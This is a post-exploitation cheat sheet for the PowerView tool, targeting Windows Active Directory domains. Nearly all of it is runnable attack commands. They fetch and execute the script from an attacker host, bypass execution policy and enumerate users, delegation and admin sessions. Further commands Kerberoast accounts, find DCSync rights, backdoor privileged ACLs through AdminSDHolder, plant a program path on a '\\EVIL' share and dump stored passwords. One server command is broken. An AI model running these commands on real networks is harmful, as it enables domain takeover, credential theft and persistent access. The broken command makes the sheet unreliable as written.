Powerview
Powerview is a powerful powershell script from powershell empire that can be used for enumerating a domain after you have already gained a shell in the system.
Start Powershell - powershell -ep bypass -ep bypasses the execution policy of powershell allowing you to easily run scripts
Transfer PowerView to the target box (see file transfers page)
Copy . .\Downloads\PowerView.ps1 Load into Memory
Copy python3 -c http.server 8000
#pull down on victim machine
iwr http://<hosting-ip>:8000/PowerView.ps1 | IEX See system info
Enumerate the domain users
Copy Get-NetUser | select cn Enumerate the domain groups
Copy Get-NetGroup -GroupName *admin* See shared folders
See Full network information
Copy Get-NetComputer -fulldata See the operating systems running
Copy Get-NetComputer -fulldata | select operatingsystem Get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
Copy Get-DomainGroup -MemberIdentity <User/Group> Get all the effective members of a group, 'recursing down'
Copy Get-DomainGroupMember -Identity "Domain Admins" -Recurse Use an alterate creadential for any function
Copy $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred Get GPO Display Name
Copy Get-NetGPO | select displayname
Get-NetGPO| select * Retrieve all the computer dns host names a GPP password applies to
Copy Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname} Get all users with passwords changed > 1 year ago, returning sam account names and password last set times
Copy $Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset All enabled users, returning distinguishednames
Copy Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname All disabled users
Copy Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
Get-DomainUser -UACFilter ACCOUNTDISABLE All users that require smart card authentication
Copy Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
Get-DomainUser -UACFilter SMARTCARD_REQUIRED All users that don't require smart card authentication, only returning sam account names
Copy Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname Use multiple identity types for any -Domain function
Copy 'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff Find all users with an SPN set (likely service accounts)
Check for users who don't have kerberos preauthentication set
Copy Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH Find all service accounts in "Domain Admins"
Copy Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'} Find users with sidHistory set
Copy Get-DomainUser -LDAPFilter '(sidHistory=*)' Find any users/computers with constrained delegation st
Copy Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth Enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation
Copy $Computers = Get-DomainComputer -Unconstrained
$Users = Get-DomainUser -AllowDelegation -AdminCount Return the local groups of a remote server
Copy Get-NetLocalGroup SERVER.domain.local Return the local group members of a remote server using Win32 API methods (faster but less info)
Copy Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local Kerberoast any users in a particular OU with SPNs set
Copy Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
Find-DomainUserLocation == old Invoke-UserHunter Enumerate servers that allow unconstrained Kerberos delegation and show all users logged in
Copy Find-DomainUserLocation -ComputerUnconstrained -ShowAll Hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
Copy Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation Find all computers in a given OU
Copy Get-DomainComputer -SearchBase "ldap://OU=..." Get the logged on users for all machines in any server OU in a particular domain
Copy Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}} Enumerate all gobal catalogs in the forest
Copy Get-ForestGlobalCatalog Turn a list of computer short names to FQDNs, using a global catalog
Copy gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname} Enumerate the current domain controller policy
Copy $DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights # user privilege rights on the dc... Enumerate the current domain policy
Copy $DomainPolicy = Get-DomainPolicy -Policy Domain
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
$DomainPolicy.SystemAccess # password age/etc. Enumerate what machines that a particular user/group identity has local admin rights to
Copy Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation Enumerate what machines that a given user in the specified domain has RDP access rights to
Copy Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP Export a csv of all GPO mappings
Copy Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv Use alternate credentials for searching for files on the domain
Find-InterestingDomainShareFile == old Invoke-FileFinder
Copy $Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential Enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
Copy Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local Grant user 'will' the rights to change 'matt's password
Copy Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose Audit the permissions of AdminSDHolder, resolving GUIDs
Copy Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs Backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
Copy Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All Retrieve most users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Copy Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
} Find linked DA accounts using name correlation
Copy Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname} Save a PowerView object to disk for later usage
Copy Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml Find any machine accounts in privileged groups
Copy Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
Copy Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} Find all policies applied to a current machine
Copy Get-DomainGPO -ComputerIdentity windows1.testlab.local Enumerate all groups in a domain that don't have a global scope, returning just group names
Copy Get-DomainGroup -GroupScope NotGlobal -Properties name Enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships
Query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
Copy $ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname
$Domains = @{}
$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
# extract the domain the foreign user was added to
$ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
# check if we've already enumerated this domain
if (-not $Domains[$ForeignUserDomain]) {
$Domains[$ForeignUserDomain] = $True
# enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
$Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
}
}
$ForeignMemberships | fl
If running in -sta mode, impersonate another credential a la "runas /netonly"
Copy $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
# ... action
Invoke-RevertToSelf
Enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer
Copy Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier Set the specified property for the given user identity
Copy Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose Set the owner of 'dfm' in the current domain to 'harmj0y'
Copy Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y Retrieve most users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Copy Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? {
($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')
} Check if any user passwords are set
Copy $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl 